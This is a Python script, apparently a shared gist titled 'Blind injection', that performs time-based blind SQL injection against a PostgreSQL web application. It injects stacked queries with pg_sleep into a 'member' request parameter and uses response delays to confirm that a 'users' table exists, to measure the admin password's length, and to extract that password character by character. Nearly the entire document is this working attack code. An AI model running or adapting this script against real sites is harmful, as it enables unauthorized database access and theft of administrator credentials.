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Last active November 18, 2017 08:15
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Blind injection
#!/usr/bin/env python
import requests
baseurl = ''
inject = '1; select case when %s then pg_sleep(15) else pg_sleep(0) end--'
cond1 = '(chr(%d) = substr((select password from users where username = $$admin$$), %d, 1))'
cond2 = '((select chr(117)||chr(115)||chr(101)||chr(114)||chr(115)) in (select table_name from information_schema.tables))'
cond3 = '(%d < (select char_length((select password from users where username = $$admin$$))))'
#r = requests.get(baseurl, params=payload);
def test():
payload = {'action' : 'member', 'member' : inject % cond2}
r = requests.get(baseurl, params=payload)
print r.url
print r.elapsed.total_seconds()
return 0
def length():
cond = cond3 % 12
payload = {'action' : 'member', 'member' : inject % cond}
r = requests.get(baseurl, params=payload)
print r.url
print r.elapsed.total_seconds()
return 0
def password():
col = ""
for i in range(1, 14):
print 'i=' + str(i)
j = 32
loop = True
while j <= 176 and loop:
# '(chr(%d) = substr((select table_name from information_schema.tables where table_schema not in ($$information_schema$$, $$pg_catalog$$)), %d, 1))'
cond = cond1 % (j, i)
payload = {'action' : 'member', 'member' : inject % cond}
r = requests.get(baseurl, params=payload)
#print r.elapsed.total_seconds()
if r.elapsed.total_seconds() > 2.4:
loop = False
col = col + chr(j)
#print j
print col
j = j+1
#print length()
print password()
#print test()
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